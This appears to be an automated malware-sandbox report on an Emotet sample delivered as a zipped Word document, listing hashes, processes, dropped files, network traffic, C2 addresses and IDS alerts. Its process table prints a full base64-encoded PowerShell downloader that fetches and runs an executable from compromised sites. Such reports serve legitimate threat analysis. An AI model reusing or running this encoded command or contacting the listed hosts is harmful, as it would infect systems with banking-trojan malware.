File name: | 6efe653a4f167bc13419.zip |
Full analysis: | https://app.any.run/tasks/1f73ae2f-604b-4a27-95ac-3488cf9491a2 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 16:05:18 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | AB06B2EE7BD9DC9B7451605F0A701503 |
SHA1: | 5BC367E0572260B4D77129039B68C667A63B1D4F |
SHA256: | 1C42D4B099223AC713F83DABB6DD66EA15BE112F3E4DA062D9F5E9C6C0B2DD0A |
SSDEEP: | 3072:yCCz7fzIgPnFH57kcrJpxXMeyOISWqZyuS:IvHhkslHWqEuS |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:18 16:04:27 |
ZipCRC: | 0x67fe5b56 |
ZipCompressedSize: | 148600 |
ZipUncompressedSize: | 270528 |
ZipFileName: | 6efe653a4f167bc134194383e0804841b20913f932280e70eea5e35d35f15915.bin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3036 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\6efe653a4f167bc13419.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2616 | "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\Rar$DIb3036.25077\6efe653a4f167bc134194383e0804841b20913f932280e70eea5e35d35f15915.bin | C:\Program Files\WinRAR\WinRAR.exe | — | WinRAR.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2812 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\6efe653a4f167bc134194383e0804841b20913f932280e70eea5e35d35f15915.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2760 | powershell -encod JABEAEkAaQBNAE0AdwBkAFAAPQAnAHAAdwA3ADkAVQBWADUATgAnADsAJAByADgAOQBCAHEAdgA5AE0AIAA9ACAAJwA1ADIAMwAnADsAJAB6ADEAbwBaAGkARABqAD0AJwBPAGwAXwBxAG0ARQBDACcAOwAkAEwAagA2AEoAbABMAEgAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcgA4ADkAQgBxAHYAOQBNACsAJwAuAGUAeABlACcAOwAkAHEAdAA0AEUAbgA2AEQAQgA9ACcAUgAzAHYAcQBpAFMARgBUACcAOwAkAEMAaQBJAEwAawBIAFUAbwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBDAEwASQBFAE4AdAA7ACQAcQBXAEcAXwBqAHoAWgBWAD0AJwBoAHQAdABwADoALwAvAHMAaABhAGUAbAAuAG8AcgBnAC8AaABvAHMAdABpAG4AZwAvAFQAWQBYAGMAaABjAEsAawBIAHoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAG8AdAB0AGkAegB6AGEAegBpAG8AbgBlAHMAYQB2AGEAcgByAGEALgBpAHQALwB3AHAALQBhAGQAbQBpAG4ALwB6AE0AaQBmAFoARABQAHUAcgAvAEAAaAB0AHQAcABzADoALwAvAGgAZQByAHIAZQBuAG0AbwBkAGUALgB0AGsALwA1AHUAcwBxAGoAbABlAHcALwB0AHQAZwAyADIAegBjAGYAXwBxADUAYwBoAG8AdgAtADMANwA3ADIAMQA1AC8AQABoAHQAdABwADoALwAvAG4AZgBiAGkAbwAuAGMAbwBtAC8AaQBtAGcALwB1AHAAbABvAGEAZABfAEkAbQBhAGcAZQAvAGUAZABtAC8AcABpAGMAXwAyAC8AdQA2AHEANAB1AGMAcQA3AF8AaAB5AGcAOAB1AHoAaABoAC0AMwA2ADkAOQA2ADMANQA1ADkALwBAAGgAdAB0AHAAOgAvAC8AZQBuAGQAbwBmAGgAaQBzAHIAbwBwAGUALgBuAGUAdAAvADIAMAAwADgALQAwADgAXwBQAFMAQgBlAGEAcgBEAG8AbgBhAHQAZQAvAHEAbQBpAHUATwBaAHYARABqAC8AJwAuACIAUwBwAGAATABpAFQAIgAoACcAQAAnACkAOwAkAGwAdAA1AHIARQBwAE0AegA9ACcATgBUAE0AUABzAEYAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBrAE8AWgBQAHoAVwAgAGkAbgAgACQAcQBXAEcAXwBqAHoAWgBWACkAewB0AHIAeQB7ACQAQwBpAEkATABrAEgAVQBvAC4AIgBkAE8AYAB3AGAATgBsAGAAbwBBAGQAZgBpAGwAZQAiACgAJABBAGsATwBaAFAAegBXACwAIAAkAEwAagA2AEoAbABMAEgAegApADsAJABsAFcAZABEADQATwA9ACcAdgBiAFgAaAB3AE0ANgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAagA2AEoAbABMAEgAegApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADIANAA4ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABMAGoANgBKAGwATABIAHoAKQA7ACQASwBfADAAdABRAHcAbwBiAD0AJwBhADkAZAB2AEsARwBHAGIAJwA7AGIAcgBlAGEAawA7ACQAQgBjAFIASABSAFYANAA9ACcARgBTAEEAbQBSAFYANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAHIAWgBjAE4ASAA9ACcAdwBuAFcAcQBGAGQAXwBhACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
408 | "C:\Users\admin\523.exe" | C:\Users\admin\523.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2584 | "C:\Users\admin\523.exe" | C:\Users\admin\523.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3400 | --d05e77b4 | C:\Users\admin\523.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3156 | --d05e77b4 | C:\Users\admin\523.exe | 523.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2852 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3736 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR42F4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\6efe653a4f167bc134194383e0804841b20913f932280e70eea5e35d35f15915.doc.LNK | lnk | |
MD5:F28A21B801723B23E4E8D3BA787D5D31 | SHA256:2743AC03A9A1EB34F3585405B53DA9B642A581C1859EA7516D08232A8EBB04A2 | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:44D19121376905BC87576A650CF64403 | SHA256:A4139B6199E77349D3689723C90AB10C58BB2D1F298CCE8348073496ED99344B | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\20085418.wmf | wmf | |
MD5:B118EDD7631B6E67EA31B12533DE9F05 | SHA256:21F0B4277140EFE127BB4CDF120A485B751DB816280FE3F2CC973D9434EAACBC | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79A952C0.wmf | wmf | |
MD5:D380A71A1B03203B26489F70EB320A64 | SHA256:DD06DE5BAC74F5593922EC5CF92F079655914BED2F2F755F1C91FD8324F6FA2E | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B0D5462.wmf | wmf | |
MD5:C79FAE111514EF6C44BC483F2FCAF326 | SHA256:24359103CAF24FE170B841F760CCA155AB6E95DC34FBF8C59A1B93509FC8E2A3 | |||
3036 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3036.25852\6efe653a4f167bc134194383e0804841b20913f932280e70eea5e35d35f15915.bin | document | |
MD5:29DF0BB5C6D77BD88EBA85409F4F9172 | SHA256:6EFE653A4F167BC134194383E0804841B20913F932280E70EEA5E35D35F15915 | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCDE54FB.wmf | wmf | |
MD5:5400FE765ADD00228CAD9EFC6F01AEB1 | SHA256:8EF8F347B69E2361CBBCC56D05460A73A82722EDAABE07E0BADA3EB497C8B290 | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CDA6C77.wmf | wmf | |
MD5:F8F9E8F5B3D9A3A51FED84E1734B06E5 | SHA256:FF97C70F2FBF4747BEA025A4FF42E8609A4756BF9E3F9880ACE028EA14D6F591 | |||
2812 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B11189E6.wmf | wmf | |
MD5:C26D37C340831F7B8E5DDBA5C41CD9A5 | SHA256:CFFBC500B5386BC639921E68ED44E5E5B8B1CEBEC3AE1DC8BF3466F66CADA859 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2628 | easywindow.exe | POST | — | 91.92.191.134:8080 | http://91.92.191.134:8080/symbols/devices/ringin/merge/ | IR | — | — | malicious |
2628 | easywindow.exe | POST | — | 59.152.93.46:443 | http://59.152.93.46:443/guids/walk/ | BD | — | — | malicious |
2760 | powershell.exe | GET | 200 | 89.46.105.48:80 | http://www.lottizzazionesavarra.it/wp-admin/zMifZDPur/ | IT | executable | 404 Kb | suspicious |
2760 | powershell.exe | GET | 200 | 156.67.209.58:80 | http://shael.org/cgi-sys/suspendedpage.cgi | SG | html | 7.40 Kb | malicious |
2628 | easywindow.exe | POST | 200 | 178.254.6.27:7080 | http://178.254.6.27:7080/badge/arizona/ | DE | binary | 148 b | malicious |
2760 | powershell.exe | GET | 302 | 156.67.209.58:80 | http://shael.org/hosting/TYXchcKkHz/ | SG | html | 681 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2628 | easywindow.exe | 91.92.191.134:8080 | — | Information Technology Company (ITC) | IR | malicious |
2760 | powershell.exe | 156.67.209.58:80 | shael.org | Hostinger International Limited | SG | unknown |
2628 | easywindow.exe | 185.129.92.210:7080 | — | Bravo Online Systems LLC | AZ | malicious |
2628 | easywindow.exe | 178.254.6.27:7080 | — | EVANZO e-commerce GmbH | DE | malicious |
2760 | powershell.exe | 89.46.105.48:80 | www.lottizzazionesavarra.it | Aruba S.p.A. | IT | suspicious |
2628 | easywindow.exe | 59.152.93.46:443 | — | Zipnet Limited DKB AS number | BD | malicious |
Domain | IP | Reputation |
---|---|---|
shael.org |
| malicious |
www.lottizzazionesavarra.it |
| suspicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2760 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2760 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2760 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2760 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2628 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2628 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2628 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2628 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |